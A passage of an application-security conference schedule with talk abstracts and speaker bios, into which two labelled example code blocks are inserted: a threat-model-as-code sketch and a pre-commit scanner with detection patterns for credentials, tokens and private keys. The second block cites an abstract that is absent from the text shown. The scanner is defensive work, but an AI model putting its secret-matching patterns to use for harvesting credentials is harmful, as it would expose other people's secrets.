James is a dynamic speaker on software engineering topics ranging from security to development practices. He spends a lot of time at the intersection of the DevOps and Security communities, and seeing the gap in software testing, James founded the open source project, Gauntlt, to... Read More →


Friday September 13, 2019 2:00pm - 3:00pm
Salon 2

3:00pm

PM Coffee Break
Friday September 13, 2019 3:00pm - 3:30pm
Exhibit Hall C

3:30pm

Threat Modeling with Flow Diagrams
Threat Modeling is a great way to identify security risk by structuring possible attacks, bad actors and security controls over a broad view of the targeted system.

Most people do threat modeling by documenting risk textually, but visual representations can be powerful. This talk will show listeners how to build flow diagrams to analyze system risk using graphical tools. We’ll explore flow diagram components and how to graph them using a whiteboard and vector graphics software. We’ll also see how to create the diagrams as code using Python with the open source tool pytm. Putting your threat model in code allows you to refactor the model easily. It also gives you the freedom to generate multiple types of views from the same input and reuse parts of the model easily.

While serving as an introduction, this presentation also gives away a few tricks to make threat modeling handy in the real world. With flow diagrams, having a clear one-pager with information at a glance offers some advantages over other detailed methods. For example, adding a simple security controls table on the same page can be used as a way of communicating requirements to development teams.

Modeling concepts will be demonstrated using different examples that are part of an OWASP Project collecting open sourced diagrams.
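Added example, not pytm's API and not the talk's code: a minimal threat-model-as-code in plain Python that keeps the idea described above, one model as input and several views generated from it (a Graphviz diagram and the security controls table for the one-pager). The element kinds, the three rules and the sample order service are constructed for illustration.

```python
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Boundary:
    name: str


@dataclass(frozen=True)
class Element:
    name: str
    kind: str                          # "actor", "process" or "store"
    boundary: Boundary                 # trust boundary the element lives in
    authenticates: bool = False        # process: verifies who is calling it
    encrypted_at_rest: bool = False    # store: data is encrypted on disk


@dataclass(frozen=True)
class Dataflow:
    source: Element
    sink: Element
    data: str
    protocol: str
    encrypted: bool = False            # protected in transit
    sensitive: bool = False            # credentials, PII, payment data, ...


@dataclass
class Model:
    name: str
    flows: list = field(default_factory=list)

    def elements(self):
        seen = {}
        for f in self.flows:
            for e in (f.source, f.sink):
                seen.setdefault(e.name, e)
        return list(seen.values())

    def findings(self):
        """Three illustrative STRIDE-style rules, each yielding (threat, where, control)."""
        out = []
        for f in self.flows:
            crosses = f.source.boundary != f.sink.boundary
            if crosses and not f.encrypted:
                out.append(("Information disclosure",
                            f"{f.data}: {f.source.boundary.name}->{f.sink.boundary.name} over {f.protocol} in clear",
                            f"TLS on {f.source.name} -> {f.sink.name}"))
            if crosses and f.source.kind == "actor" and f.sink.kind == "process" and not f.sink.authenticates:
                out.append(("Spoofing", f"{f.sink.name} takes {f.data} from {f.source.name} unauthenticated",
                            f"authenticate callers of {f.sink.name}"))
            if f.sensitive and f.sink.kind == "store" and not f.sink.encrypted_at_rest:
                out.append(("Information disclosure", f"{f.sink.name} holds {f.data} unencrypted at rest",
                            f"encrypt {f.sink.name} at rest"))
        return out

    def to_dot(self):
        """Diagram view: Graphviz DOT with one dashed cluster per trust boundary."""
        shape = {"actor": "box", "process": "ellipse", "store": "cylinder"}
        by_boundary = {}
        for e in self.elements():
            by_boundary.setdefault(e.boundary.name, []).append(e)
        lines = [f'digraph "{self.name}" {{', "  rankdir=LR;"]
        for i, (bname, elems) in enumerate(by_boundary.items()):
            lines.append(f'  subgraph cluster_{i} {{ label="{bname}"; style=dashed;')
            lines += [f'    "{e.name}" [shape={shape[e.kind]}];' for e in elems]
            lines.append("  }")
        for f in self.flows:   # dashed edge = cleartext, so the risky hops stand out
            lines.append(f'  "{f.source.name}" -> "{f.sink.name}" '
                         f'[label="{f.data}\\n{f.protocol}" style={"solid" if f.encrypted else "dashed"}];')
        lines.append("}")
        return "\n".join(lines)

    def controls_table(self):
        """One-pager companion: the findings as a requirements table for the dev team."""
        rows = ["Threat | Where | Required control", "--- | --- | ---"]
        rows += [" | ".join(finding) for finding in self.findings()]
        return "\n".join(rows)


# Constructed sample: a small order service spanning three trust boundaries.
INTERNET, DMZ, INTERNAL = Boundary("Internet"), Boundary("DMZ"), Boundary("Internal")
customer = Element("Customer", "actor", INTERNET)
api = Element("Orders API", "process", DMZ, authenticates=True)
db = Element("Orders DB", "store", INTERNAL)
SAMPLE = Model("Order service", [
    Dataflow(customer, api, "credentials + order", "HTTPS", encrypted=True, sensitive=True),
    Dataflow(api, db, "order PII", "MySQL", sensitive=True),
])

if __name__ == "__main__":
    print(SAMPLE.to_dot())          # pipe into: dot -Tpng -o order-service.png
    print(SAMPLE.controls_table())
```

Because the rules run over the same objects that draw the diagram, adding `encrypted=True` to the database flow both removes the finding from the table and turns the edge solid in the picture, which is the refactoring benefit the abstract describes.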

Speakers
avatar for Jonathan Marcil

Jonathan Marcil

Application Security Engineer, Twitch
Jonathan has created over a hundred threat models during his career and enjoys sharing his experience. He currently leads the OWASP Media Project and is a board member of the OWASP Orange County chapter located in beautiful Irvine, California. Originally from Montreal, he was the... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 2

3:30pm

Salesforce Data Governance: What dark secrets lurk in your instance?
Salesforce only has Sales and Marketing information, right? WRONG!

Over the years, Salesforce has grown and evolved exponentially. Companies are leveraging Salesforce in many ways, adding even more sensitive customer data to the platform. While Salesforce is very secure, it’s still a platform that can be implemented in a way that puts your org at risk.

So how do you know Salesforce is implemented in a way that meets your compliance needs? And how do you actually align your Salesforce implementation to your Security Posture?

It all starts with Data Governance, the foundation for Salesforce security. Data Governance provides the ability to effectively manage data using appropriate controls throughout the information lifecycle process to meet various internal and external requirements.

We’ll explain the basics and then dive into the more complex topics on how Salesforce, the lifecycle of customer data, and regulatory compliance can all effectively co-exist. We will explain the capabilities available to implement the 4 pillars of Data Governance (Data Inventory, Data Security, Data Privacy and Data Compliance).

You’ll walk away with tangible next steps for governing Salesforce, like data classification, access management, encryption at rest, user access management, compliance reporting and more.

Learn the nuances of Salesforce and what questions to ask your Salesforce team to ensure Salesforce is implemented in a way that aligns to your Security Posture!

Speakers
avatar for Patrick Fields

Patrick Fields

Account Executive, RevCult
Patrick Fields is Account Executive – East with RevCult, tasked with leading the firm’s sales efforts with clients based in the Eastern United States. Mr. Fields is an experienced information security sales executive with a background in Governance, Risk and Compliance (GRC... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 3

3:30pm

How to Fix the Diversity Gap in Cybersecurity
Women make up just 11 percent, and minorities slightly less than 12 percent, of the cybersecurity workforce. Also, only 4% of hackers are women. Coming from a nonprofit background, an industry with high diversity, to one where it is so unbalanced is disheartening. I’ve connected with persons who are underrepresented in the field, and many, after spending years in cybersecurity, are leaving the field. From their shared experiences as well as my own, it is clear that the cybersecurity space needs to get real about the lack of diversity in the space, and the necessity to make changes as we approach the estimated shortage of 1.5 million cybersecurity professionals. In this talk, we will discuss our brains and how we label and prejudge, hear experiences of underrepresented people in the space, what can be done to fill the gap, and how to increase and retain the number of qualified candidates in cybersecurity.

Speakers
avatar for Chloe Messdaghi

Chloe Messdaghi

VP of Strategy, Point3 Security
Chloé Messdaghi is the VP of Strategy at Point3 Security.  She is a security researcher advocate who pushes for hacker rights, and strongly believes that information security is a humanitarian issue. Besides her passion to keep people safe and empowered online & offline, she is... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 6

3:30pm

Who Dis? The Right Way to Authenticate
Online verification of identity today extends across microservices, cloud providers, IoT devices, emerging systems and end users. In a brief study we conducted on the 100 most visited websites, over 95% supported authenticated sessions, and more than 97% of these were username- and password-based. With 81% of discovered breaches due to broken authentication, there is still a problem to solve, and this is the focus of our talk.

Developers are generally aware of the different authentication methods used for secure interaction between these entities, but most often miss out on best practices. In this context, we discuss popular authentication schemes adopted by developers today, like SAML, OAuth, tokens and magic links, and emerging ones like WebAuthn. We will present incorrectly coded authentication patterns observed in our study and also highlight recurring mistakes like MFA bypass, token leakage and other authentication misconfigurations. Finally, we provide secure blueprints that developers can leverage to bake security into their software development lifecycle.

Speakers
avatar for Dhivya Chandramouleeswaran

Dhivya Chandramouleeswaran

Security Engineer, Lyft
Dhivya Chandramouleeswaran is a security engineer at Lyft providing proactive security guidance to key product teams. She develops security automation tools and enjoys reviewing the security of new technologies. She has given talks at OWASP App Sec DC, Defcon BTV, CSA summit and BSides... Read More →
avatar for Lakshmi Sudheer

Lakshmi Sudheer

Security Researcher
Lakshmi Sudheer is a Security Researcher. She has been in the security industry for about four years now. She works on reviewing architectures and providing security guidelines to various product teams. Prior to this, she was at a startup doing all things Application Security and... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 4

3:30pm

SEDATED
Prevent Sensitive Data (creds/tokens) from being pushed to git repos. FREE T-SHIRTS for those in attendance!
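Added example, not SEDATED's code: the kind of check a pre-commit hook runs to keep credentials and tokens out of a repository, which is also where the hard-coded keys and passwords the "Keys Under Doormats" abstract describes get caught cheapest. The sample lines are constructed; AKIAIOSFODNN7EXAMPLE is the placeholder access key ID used in AWS documentation, and the patterns and entropy threshold are assumptions to tune per repository.

```python
import math
import re
import sys

# Constructed sample of lines as they might appear in a staged file.
SAMPLE_LINES = [
    'DB_HOST = "db.internal"',
    "aws_access_key_id = AKIAIOSFODNN7EXAMPLE",
    'api_token = "q7Zr2mLk9XpV4wBn1YtC6sHd8JgF3aEe"',
    'password = "changeme"',
    "-----BEGIN RSA PRIVATE KEY-----",
]

# Fixed-format rules: (name, regex); group 1 is the secret.
PATTERNS = [
    ("AWS access key ID", re.compile(r"(?<![A-Z0-9])(AKIA[0-9A-Z]{16})(?![A-Z0-9])")),
    ("Private key block", re.compile(r"(-----BEGIN (?:[A-Z]+ )?PRIVATE KEY-----)")),
]
# Generic rule: a secret-looking variable assigned a quoted literal of 16+ chars.
# The keyword alone is noisy ("password = ''" in tests), so the value is then
# judged by its Shannon entropy: random base64/hex sits near 4-6 bits per
# character, English words and placeholders near 2-3.
ASSIGNMENT = re.compile(
    r"(?i)(?:password|passwd|pwd|secret|token|api[_-]?key)\w*\s*[=:]\s*[\"']([^\"']{16,})[\"']")
ENTROPY_THRESHOLD = 3.5


def shannon_entropy(s: str) -> float:
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def redact(secret: str) -> str:
    """Never echo the full secret back into a CI log; it would just leak again there."""
    return secret[:4] + "..." + secret[-2:] if len(secret) > 8 else "***"


def scan_lines(lines):
    """Return (line_number, rule, redacted_secret) for every hit, in line order."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for name, rx in PATTERNS:
            for m in rx.finditer(line):
                findings.append((n, name, redact(m.group(1))))
        for m in ASSIGNMENT.finditer(line):
            value = m.group(1)
            bits = shannon_entropy(value)
            if bits >= ENTROPY_THRESHOLD:
                findings.append((n, f"High-entropy secret assignment ({bits:.2f} bits/char)", redact(value)))
    return findings


def main(paths) -> int:
    """Pre-commit entry point: print hits and exit non-zero so the commit is refused."""
    hits = 0
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for n, rule, shown in scan_lines(fh.read().splitlines()):
                print(f"{path}:{n}: {rule}: {shown}")
                hits += 1
    return 1 if hits else 0


if __name__ == "__main__":
    if len(sys.argv) > 1:
        sys.exit(main(sys.argv[1:]))
    for hit in scan_lines(SAMPLE_LINES):
        print(hit)
```

Wired in as `.git/hooks/pre-commit` with `git diff --cached --name-only` supplying the paths, this stops the secret before it is in history; anything that reaches a shared branch has to be treated as leaked and rotated, because rewriting history does not recall the clones already made.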

Speakers
avatar for Dennis Kennedy

Dennis Kennedy

Application Security Engineer, Allstate
Currently works as an Application Security Engineer for Allstate, since 2017. Working with application development teams to build security into their applications and raise awareness of the importance of application security through demonstrations and presentations on various topics... Read More →


Friday September 13, 2019 3:30pm - 4:15pm
Virginia A

3:30pm

Swimming with the kubectl fish: the why, the how, the what of the CNCF Kubernetes Assessment
Trail of Bits participated in the first wide-scale assessment of Kubernetes for the CNCF. This talk relays the unique challenges presented by Kubernetes, the focus of the assessment, as well as some of the more interesting findings. We will present three over-arching themes of the Kubernetes code base, and how these patterns influence the system as a whole.

Speakers
Stefan Edwards

Principal Security Engineer, Trail of Bits
Stefan performs assurance work across a variety of verticals, from blockchain to IoT to Defense. In addition, he’s heavily involved in our infrastructure and architecture review work, and makes discerning comments in our reports. Prior to Trail of Bits, Stefan worked at nVisium...


Friday September 13, 2019 3:30pm - 4:15pm
Lincoln 5

4:30pm

The Zest of ZAP: How scripting in our favorite tool can bridge the gap between dev teams and security
Security testing has a reputation for being mysteriously technical and conceptually unapproachable to many in the field of technology; they know it's important on some level but still approach security as mysticism and superstition rather than technical reality. Simultaneously, the average security team is too overloaded to help guide the daily needs of those very same teams.

While this operational gap can be large, it does not need to be accepted as truth. By using OWASP ZAP and its handy scripting engines, we will explore how such an application can serve as a testing tool for development teams in a way that enhances the quality of assertions in the current QA arsenal for exploratory, functional, regression, integration and automated test processes. In so doing, it also provides a natural springboard from which to incorporate security concerns, concepts, and education.

Speakers
Peter Hauschulz

Software Test Engineer/Security Tester, HumanIT
Peter is a Software Test Engineer/Security Tester who holds a bachelor’s degree in Psychology and Integrative Physiology, with a focus on the influence of group perception, behavior, and pathology. His work experiences include a wide range of oddities beyond computers, from shelving...


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 2

4:30pm

Pilots, Surgeons and Developers - Improving Application Security With Checklists
Multiple studies have shown measurable reductions in risk and improved outcomes in both aviation and medicine when participants follow well-documented, basic processes enforced with lightweight checklists. Using a checklist ensures that common risks are consistently eliminated or minimized, and reduces regressions.

In this session you will build an application security checklist customized for your specific technology needs. The checklist you build can be used by development, operations and/or security teams to improve the application security posture of your applications and minimize the risk of releasing vulnerabilities into production.

Speakers
Joe Kuemerle

Security Engineer
Joe Kuemerle is an application security engineer, developer and speaker in the greater New York City area specializing in application security, development, database and application lifecycle topics. Joe is active in the technical community as well as a speaker at local, regional...


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 3

4:30pm

Testing with your left foot forward
DevOps has brought many benefits to security: SAST and SCA security tools have been baked into build pipelines, and to some extent even automated DAST has been integrated into them. However, this leaves a gap with manual testing. Manual assessments occur, be it in house or via bug bounties, and at best we can automate the delivery of our results into a defect tracker like Jira. However, this just adds to the backlog; we can do better. This talk will explore how manual testing efforts can, using standard, pre-existing dev and QA tools, be more tightly coupled into the build pipeline and drive faster remediation.

Speakers
Jeremy Long

Principal Engineer
Jeremy Long is a principal engineer at a large financial institution. He specializes in securing the SDLC via secure development training, security requirements and coding standards, tooling for early identification in build pipelines, etc. He has a deep understanding of static analysis...


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 6

4:30pm

IoT AppSec: Automatic Security Analysis of IoT Firmware
This talk is the result of a 6-month-long personal project of mine to automatically unpack and analyze IoT firmware for common security issues, with a nice web GUI to boot. ByteSweep is a Free Software platform that automates a lot of the common steps I conduct manually when performing IoT pentests. ByteSweep utilizes the Python libraries provided by binwalk to programmatically extract filesystems from firmware images. In order to extract crypto keys and password hashes hard-coded into firmware images, ByteSweep implements a custom strings regex search engine with configurable rules stored in a config file. Radare2's Python r2pipe library is used to analyze extracted binaries for any unsafe function calls (e.g. strcpy, sprintf, system, etc.). Version strings are extracted, using the strings regex search engine, from 3rd-party components like open source programs and/or libraries. These version numbers are then compared against the software versions associated with CVEs by using the NVD JSON Data Feed.

My talk will feature live demos of the ByteSweep platform but I'll pre-record them all in case of failure.

ByteSweep Licensing:
* Web Frontend: AGPLv3
* Backend Worker: GPLv3



Speakers
Matt Brown

IoT Pentester
Matt Brown (nmatt) works by day as an infosec professional and by night as a Free Software hacker. His interests in IoT security began at his first defcon (23) where he placed 2nd in the IoT CTF. Today, Matt works as an internal IoT pentester for a major home security company. Matt...


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 4

4:30pm

Defect Dojo
Speakers
Matt Tesauro

Matt Tesauro is currently establishing an SDLC at a large healthcare software provider. Prior to his current role, he was a Senior AppSec Engineer building an AppSec Pipeline and continuous security program for Duo Security. Previously, he was a founder and CTO of 10Security, a Senior...


Friday September 13, 2019 4:30pm - 5:15pm
Virginia A

4:30pm

Real Time Vulnerability Alerting by Using Principles from the United States Tsunami Warning Center
Vulnerabilities and attacks are like tsunamis caused by earthquakes: they hit without warning, cause heavy damage and leave us scrambling. Although one cannot predict earthquakes, there are two tsunami warning systems operated by NOAA in the United States which produce reliable results in the nick of time. Based on the same core concepts and principles, we have built an open source Vulnerability Warning Center that alerts on highly seismic vulnerabilities before they hit your organization's shore.

In this session we will demonstrate how a real-time vulnerability alerting system can be built in the AWS cloud using public data. With more than 2000 unique vulnerabilities disclosed every month, CSOs and security practitioners have an impossible task of cutting through the noise and prioritizing the most critical issues for remediation. Doing this daily is excruciating, and weekly is too slow. Wouldn't it be nice if there were an automated system that alerted on the most gruesome high-profile vulnerabilities in real time to produce actionable insights?

Rather than getting data from honeypots and sensors, we took a different approach and harnessed public data on attacks, exploits, data leaks, vulnerabilities, blogs, Twitter and numerous other data points to create simple alerts and graphs that warn on actionable insights in real time. Even in this initial phase the system has shown remarkable results, which we will demonstrate to the audience. In the live demo we will ask the audience to pick a day, week or month and demonstrate the system's capability to identify the most pressing security vulnerabilities during that timeframe.

We will examine the design and implementation details to show how the system can cut through the noise and rank the most relevant real-time vulnerability information. We believe that we have just scratched the surface; in the future, we plan to apply NLP together with AI and ML to process even more public data from different regions, languages and sources, which will increase the system's coverage and accuracy and extend the industries it currently targets. To conclude, we will demonstrate that a system based on public data can accurately and in real time curate, identify and prioritize high-priority vulnerabilities to provide actionable insights.

Speakers
Amol Sarwate

Head of Security Research, CloudPassage Inc.
Amol Sarwate heads CloudPassage's worldwide security research, responsible for cloud-focused vulnerability and compliance research. He has devoted his career to protecting, securing and educating the community against security threats. Sarwate has presented his research on vulnerability...


Friday September 13, 2019 4:30pm - 5:15pm
Lincoln 5